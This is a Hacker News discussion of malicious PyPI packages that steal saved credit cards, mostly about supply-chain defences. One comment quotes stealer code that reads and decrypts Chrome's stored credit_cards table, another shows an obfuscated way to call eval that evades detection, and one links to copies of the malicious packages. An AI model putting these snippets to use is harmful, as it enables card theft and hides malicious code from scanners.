37 ms·
Malicious PyPI packages stealing credit cards and injecting code
- dailyanchovy 5y agoNice writeup, but the title flashes to '(1) New Message' and back twice a second. That's kind of silly in my opinion, from whom do I expect the message? I assume from the chatbot at the bottom right corner. Even so, to talk to it I would need to grant it access to some personal information. It all ends up leaving a bitter aftertaste. Whatever the message was, why not place it in a block of text somewhere less distracting. I appreciate the writeup however.
- cube00 5y agoThis junk is appearing on more and more web sites, at least this one is clearly a bot. Plenty of sales sites will pretend a human is sending you a message, try and talk back and all of a sudden you're in a queue waiting for a reply. Another anti pattern for web.
- dailyanchovy 5y agoYeah. The sad thing is, I've never used a single chatbot that was actually helpful. I naturally don't go looking for conversations with chatbots, but recently more and more companies decided to shut down their email address. So the only way to resolve an issue is by wither talking to a chatbot and then a person (hopefully), or by phoning them (and I'd rather not). Some chatbots even refuse to let me talk to a person at all due to a bug (the dutch water utility service). Another asks you to write a message to the human representative and then discards it due to a bug (bol.com).
- jimmaswell 5y agoI've had some success finding the pages or processes I need on a site with virtual assistants, but the design of the website had failed in the first place if I had to resort to that.
- NullPrefix 5y agoWell don't be rude, say hi, you never know if it's a person on the other end. In that case it's ok to open up about the current events in your dogs' life.
- rchaud 5y agoIt's a billion-dollar anti-pattern that's been sanitized as "conversational commerce". Several large orgs have Intercom, Drift or other popups infesting their site....by choice!
- avian 5y ago> This junk is appearing on more and more web sites, at least this one is clearly a bot. This is the first time I've seen a page flashing the title like that. Extremely annoying and I closed the page before reading the article to the end. It reminded me of the times when pages used to do that with the browser status bar on the bottom of the window.
- acdha 5y agoAdd these to your hosts file and the page will load a lot faster, too: 0.0.0.0 js.driftt.com 0.0.0.0 send.webeyez.com sec.webeyez.com 0.0.0.0 splitting.peacebanana.com flaming.peacebanana.com
- null_deref 5y agoOh at last, I can feel slightly less ashamed of being part of the Israeli technology scene.
- fortran77 5y agoכל ישראל ערבים זה לזה
- null_deref 5y agoI fully believe in this statement, and let me assure you I'm proud to be Israeli. But, when NSO articles pop like mushrooms after rain, I feel sad for a period of time (a feeling I also encounter when I read about Israeli internet gambling companies).
- geofft 5y agoAnyone can upload anything to PyPI. This is kind of like saying that you detected malicious packages on GitHub - the question is whether anyone actually ran it. They say that the packages were downloaded 30,000 times, but automated processes like mirrors can easily inflate this. (As can people doing the exact sort of research they were doing - they themselves downloaded the files from PyPI!) Quoting PyPI maintainer Dustin Ingram https://twitter.com/di_codes/status/1421415135743254533 https://twitter.com/di_codes/status/1421415135743254533 : > *And here's your daily reminder that download statistics for PyPI are hugely inflated by mirrors & scrapers. Publish a new package today and you'll get 1000 'downloads' in 24 hours without even telling anyone about it.*
- yonixw 5y agoIf anyone wonders about the same for NPM, it is around 400. That what happened to my almost empty package. https://i.imgur.com/Ryr2voN.png https://i.imgur.com/Ryr2voN.png
- Frost1x 5y agoPart of the issue is that FOSS, libraries, and independendent package managers and their specific repositories have exploded in about every domain. No longer are there a handful of places where software and libraries exist. Pick an ecosystem and there's probably a sub or additional levels of package/library management ecosystems below it. Developers have really bought into grabbing a package for everything and leveraging hundreds and thousands of packages, most of which have limited to no sort of vetting. We've had software complexity growing over the years, but the one benefit in previous years is that it was in fairly concentrated areas where many eyes were often watching. You could somewhat rely on the fact that someone had looked through and approved such additions to a package repo. It's a naive security but there were more professional eyes you could leverage, lowering overall risk. Not anymore, it's more of this breakneck speed, leverage every package you can to save resources and glue them together without looking at them in detail, because the entire reason you're using them is because you don't have time. It's not all shops, plenty of teams vet or roll their own functionality to avoid this but there's a large world of software out there that just blindly trusts everything down the chain in an era where there should be less trust. Some software shops have never seen a package or library they didn't like and will use even trivial to implement packages (the benefit of your own implementation being you know it's secure and won't change under your feet unless an inside threat makes the change). There's a tradeoff to externalizing costs and tech debt for maintainance you pass on using these systems, the cost being you take on more risk in various forms.
- peanut_worm 5y agoI am surprised this doesn’t happen to NPM all the time
- legrande 5y ago> The second payload of the noblesse family is an “Autocomplete” information stealer. All modern browsers support saving passwords and credit card information for the user: > Browser support for saving passwords and credit card information > This is very convenient, but the downside is that this information can be leaked by malicious software that got access to the local machine. I never store CC deets anywhere, not even in a secure password manager vault. I typically manually type it out from the card, as I rarely use a CC (Every month or so I use it). I can see why automatically filling in CC info would be useful for people who use their CC a lot. If I was using it a lot, I would use a non-browser password manager however, since browser secrets can be exfil'd via various means and I trust a non-browser password manager vault more.
- DannyBee 5y agoIn the US, CC has, by law, almost no liability for fraud - it's capped at 50 bucks, and is 0 bucks if you report it before it gets used. They are also easily replaced, so i think many wouldn't go as far as you are. Debit cards are weirder in their liability (and are extracting money from your bank account, which is harder to get back). If you report them lost/stolen before someone uses them, it's 0 bucks Within 2 days of learning about it, it's 50 bucks. More than 2 days, but less than 60, 500 bucks. More than 60 days - unlimited liability. So i'd be a lot more careful with debit cards, at least in the US. (You are never liable on either for unauthorized transactions when your card is not lost/stolen as long as you report them within 60 days)
- r3trohack3r 5y agoHmm. I understood this to be different, but realizing now I don’t have sources for where I learned this: * Bank accounts, savings accounts, brokerage accounts, etc. are all unlimited liability * Lines of credit are all zero liability I’ve used this as a rule of thumb for many years, and was the initial reason for me switching to 100% credit cards for transactions.
- DannyBee 5y agoYeah, i'm telling you based on what the statutes say (the FCBA covers credit cards, the EFTA covers debit) A short version of it is here: https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-credit-atm-and-debit-cards https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-cr...
- yardstick 5y agoThis is why our build systems don’t use public repositories directly, and why we always pin to an exact version. Any third party dependencies (js/python/java/c/you-name-it) are manually uploaded to our Artifactory server- which itself has no internet access. All third party libraries are periodically checked for new versions, any security announcements etc, and only if we are happy do we update the internal repo. It has been a bit of a challenge, especially with js & node and quite literally thousands of dependencies for a single library we want to use. In such cases we try avoid the library or look for a static/prepackaged version, but even then I don’t feel particularly comfortable. I should really start specifying checksums too.
- deleted 5y ago[deleted]
- ericpauley 5y agoOut of curiosity, is it really necessary to have the separate artifact server? Pinning dependencies by hash ought to be sufficient.
- fortran77 5y agoIt's nice to have a build machine that can complete a build when it's disconnected from the Internet
- kawsper 5y agoHow often does that happen?
- 83457 5y agoSometimes I use an air gapped test lab. Setup of certain software and projects is a real pain. Sounds like this approach could help.
- oauea 5y agohttps://hn.algolia.com/?q=cloudflare+down https://hn.algolia.com/?q=cloudflare+down https://hn.algolia.com/?q=akamari+down https://hn.algolia.com/?q=akamari+down https://hn.algolia.com/?q=github+down https://hn.algolia.com/?q=github+down
- smallerfish 5y ago``` def cs(): master_key = master() login_db = os.environ['USERPROFILE'] + os.sep + \ r'AppData\Local\Google\Chrome\User Data\default\Web Data' shutil.copy2(login_db, "CCvault.db") conn = sqlite3.connect("CCvault.db") cursor = conn.cursor() try: cursor.execute("SELECT * FROM credit_cards") for r in cursor.fetchall(): username = r[1] encrypted_password = r[4] decrypted_password = dpw( encrypted_password, master_key) expire_mon = r[2] expire_year = r[3] ``` Where does master_key come from here? Is chrome encryption of sensitive information really as weak as that?
- oefrha 5y agoI found a copy on a PyPI mirror and at a glance couldn't find any of the malicious code mentioned: https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cda31f9f40c851d7fdb3a52b0a397d187fba11444b5e695462d/noblesse-0.0.6.tar.gz#sha256=41d588aaff8c2d1fddaf54c0d764768f3e193401c6e513e8d582c70b25c3a5dd https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cd... Also a copy of noblesse2, which I didn't bother to look into due to obfuscation: https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cff9b84f04645d311bc7407f2f4bc0d06aaced786a4275e3996/noblesse2-0.0.1.tar.gz#sha256=f8ec18c604c154cba29d69a4c95b97155efc27c12a7a6ff0f4ecd87f70315314 https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cf...
- RL_Quine 5y agoWhat do you expect it to be "encrypted" with? Unless the user is entering a password every time they start the browser, there's nothing unique to a system that other malware can't just extract and use to decrypt the database.
- smallerfish 5y agoRight, but I wouldn't have expected that processes outside of chrome could get at its internally managed db (or encrypted properties), especially if it's using an authenticated (chrome) user profile. Windows doesn't have any application firewalls by default? I thought that was the whole thing that came in with Vista that people were upset about. (Of course, thinking it through, Linux isn't any better, assuming the process is running as the same user.)
- speedgoose 5y agoI'm using Github Codespaces since a few months and I'm wondering whether developing in such a remote sandbox is an improvement for security. I feel like it would prevent a python or npm package to steal my cookies and credit card numbers.
- terom 5y agohttp://webcache.googleusercontent.com/search?q=cache%3Ahttps%3A%2F%2Fpypi.org%2Fproject%2Fgenesisbot%2F http://webcache.googleusercontent.com/search?q=cache%3Ahttps... Google cache still has the malicious package visible FWIW > This Module Optimises your PC For Python
- toyg 5y ago> This Module Optimises your PC For Python Well, it does... just not for your Python...
- TheFreim 5y agoOur python
- gunapologist99 5y agoAll your Pythons are belonging to us
- karmicthreat 5y agoThere is lots of inconsistency about hash behavior with the various repos (pypi, ruby gems) and tools (poetry, bundled). For a long time poetry didn’t even check the hash. So the safer option is just maintain these artifacts yourself so you know what is going on and have your own policies on maintaining them.
- ageofwant 5y agoInteresting that all the noted examples assume a Windows host. I like that, people that use Windows deserve the drama the get ;-)
- outworlder 5y agoSometimes they don't get a choice. Specially in a corporate environment.
- CivBase 5y agoI wonder how many Python packages have a justifiable reason for using `eval()` to begin with. I've been writing Python professionally for almost a decade and I've never run into a use case where it has been necessary. It's occasionally useful for debugging, but that's all I've ever legitimately considered it for. It's neat that JFrog can detect evaluation of encoded strings, but I think I'd prefer to just set a static analysis rule which prevents devs from using `eval()` in the first place.
- psanford 5y agoThere are plenty of ways you can obfuscate calls to `eval`. `unpickle` is a classic example.
- banana_giraffe 5y agoYou can always call eval without ever mentioning eval in code: __builtins__.__dict__[''.join(chr(x^y^(i+33)) for i,(x,y) in enumerate(zip(*[iter(ord(z) for z in '2vb63qz2')]*2)))]("print('hello, world')") Maybe there are ways to detect all of the paths, but it feels like a tricky quest down lots of rabbit holes to me. There are also some fairly big packages that use eval(), like flask, matplotlib, numba, pandas, and plenty of others. Perhaps they could be modified to not use eval, but it might be more common than you expect.
- hiccuphippo 5y agoI don't think there's a good reason to have eval in interpreted languages. Sure the REPL uses it but it could be implemented internal to the REPL instead of exposing it in the language.
- blibble 5y agonamedtuple used exec() (I've also used exec() for some nasty bundling of multiple python files into one before)
- ConcernedCoder 5y agoholy crap the stuff in: AppData\Local\Google\Chrome\User Data\default\Web Data ... wtf are you thinking google?
- human_error 5y agoThe result of having a hiring barrier too high.
- AtlasBarfed 5y agoOh look, an advertisement. Also, thank you for causing mass disruption in javaland by shutting down your repos on pretty short notice. Artifactory may be a good piece of software with a good purpose, least of which is the public repository security problem, but every company I have been has used it with a hammer to stifle use of open source and create a "lords of data" style fiefdom in the company with tons of procedures.
- goodpoint 5y agoThis is why I use packages from a Linux distribution - specifically Debian.
- snapetom 5y agoI've never heard of these libraries. Anyone know what they did?
- HALtheWise 5y agoIt seems to me like one low hanging fruit to make a lot of these kinds of exploits significantly more difficult is protection at a language level about which libraries are allowed to make outgoing HTTP requests or access the file system. It would be great if I could mark in my requirements.txt that a specific dependency should not be allowed to access the file system or network, and have that transitively apply to everything it calls or eval()'s. Of course, it would still be possible to make malware that exfiltrates data through other channels, but it would be a lot harder. I am not aware of any languages or ecosystems that do this, so maybe there's some reason this won't work that I'm not thinking of.
- parhamn 5y agoI was wondering earlier how useful deno's all-or-nothing policies would actually be in the real world. It seems like rules like this (no dep network requests, intranet only, only these ips) are much more useful than "never talk to the web". For python this probably wont ever be possible given the way the import system works and the patching packages can do.
- tadfisher 5y agoPortmod[0] is a package manager for game modifications (currently Morrowind and Doom), and it runs sandboxed Python scripts to install individual packages. So I think this is possible, but it's not a built-in feature of the runtime as is the case for deno. [0]: https://gitlab.com/portmod/portmod https://gitlab.com/portmod/portmod
- hortense 5y agoThis can be done with capability-based operating system, though it requires running the libraries you want to isolate in a separate process. On a capability-based OS you whitelist the things a given process can do. For instance, you can give a process the capability to read a given directory and write to a different directory, or give the capability to send http traffic to a specific URL. If you don't explicitly give those capabilities, the process can't do anything.
- delosrogers 5y ago
- LambdaTrain 5y agoOn Windows 10 if I want to view plaintext of stored password in chrome, the password of the currently logged in Windows user will be required. So is password stored and encrypted? Just wondering if the same is done to cc information and if such practice is effective against malware stealing
- latch 5y agoElixir recently added hex diff, which I've found quite useful. E.g.: https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8 https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8
- qwertox 5y agoI don't think that it's good to just delete the packages. Same goes for Android Apps in the Google Play Store or for Chrome Extensions. These compromised packages should have their page set to a read-only mode with downloads/installs disabled, with a big warning that they were compromised. This is specially troublesome with Chrome Extensions and Android Apps, where it is not possible to get to know if I actually had the extension installed, and if I had, what it was exactly about. Chrome Extensions getting automatically removed from the browser instead of permanently deactivated with a hint of why they can't be activated again, and which was the reason why the extension got disabled, is a problem for me. How do I know if I had a bad extension installed, if personal data has been leaked? This also applies to PyPI to some degree. ---- Eventually the downloads should get replaced with a module which, when loaded, prints out a well defined warning message and calls sys.exit() with a return code which is defined as a "vulnerability exception" which a build system can then handle.
- tylfin 5y agoThere is the "Yank" PEP 592 semantic that can be used to mark vulnerable packages. It's adoption has been a little slow, but I agree, having these packages available and marked accordingly makes it easier for security scanning and future detection research. https://www.python.org/dev/peps/pep-0592/ https://www.python.org/dev/peps/pep-0592/
- gunapologist99 5y agoEven better would be allow their install, but to have them start up with an immediate panic() sort of function (i.e., print("This package has been found to be malicious; please see pypi/evilpackagename for details"); sys.exit(99)) to force aborts of any app using those packages.
- blamestross 5y agopython packages run arbitrary code at install/build time, so this isn't viable.
- soheil 5y agoI feel like they could have done a better job hiding the code. Even something as simple as base64 the code and storing it as a constant and then doing an eval. Scanning for something like table name credit_card is simple enough to expose this exploit. Now I'm worried what other exploits of similar form are out there that remain undetected.
- soheil 5y agoCan trusted PyPI packages or other language packages be taken over? Can their author once benevolent become malicious and inject code and push a minor version after they wake up one day?
- mm983 5y agothere once was an adblocker called nano which was open source and quite popular. the developer sold the ownership and the new owners injected malware which was then shipped to all chrome users with the extension. so i don't see why the same shouldn't work for pypi packages and i also don't understand why noone saw this coming. with how many companies have adopted python there surely will be a security vendor willing to provide free package screening for the repo
- joelbondurant 5y agoimport usafacts; import malware; usafacts.check(malware);
- at_a_remove 5y agoI have some pretty complex feelings about this. Many people end up at a given programming language because they are fleeing something else, rather than being necessarily drawn to it, and I know that in some senses, Python was my reaction to having to deal with what I didn't like about Perl. One of the larger factors was dealing with CPAN. I was always having to hunt down modules, which would do maybe seventy percent of what I needed, or a another module, that would cover a different seventy percent. And then comes the question of, "Can I get this to run on Windows?" Meanwhile, Python made hay with its enormous standard library and certainly xkcd made many references to it. Now people tell me that the standard library is where code goes to die and I get sad all over again ...
- mm983 5y agowhy don't they start a partnership with a security company like they have with a server monitor and google? many security vendors use python somewhere (1), so I'm sure there would be someone willing to cooperate. scan all packages uploaded and all updates, when there is a detection put a warning on the page and in console put a warning like "this package might contain maliscious code. continue regardless?" so that typosquatting and code hijacking is mitigated 1 https://github.com/KasperskyLab?q=&type=&language=python&sort= https://github.com/KasperskyLab?q=&type=&language=python&sor... https://github.com/CrowdStrike?q=&type=&language=python&sort= https://github.com/CrowdStrike?q=&type=&language=python&sort... https://github.com/intezer?q=&type=&language=python&sort= https://github.com/intezer?q=&type=&language=python&sort=
- karlzt 5y agoI submitted this link: https://thehackernews.com/2021/07/several-malicious-typosquatted-python.html?m=1 https://thehackernews.com/2021/07/several-malicious-typosqua... https://news.ycombinator.com/item?id=28022035 https://news.ycombinator.com/item?id=28022035 3 days ago and it was killed, I wonder why?...
- fnord77 5y agohow to check if any of these packages are installed on a system? It seems like python (mac version, various homebrew versions) writes packages all over the place, from user-local dirs, to /usr/local etc.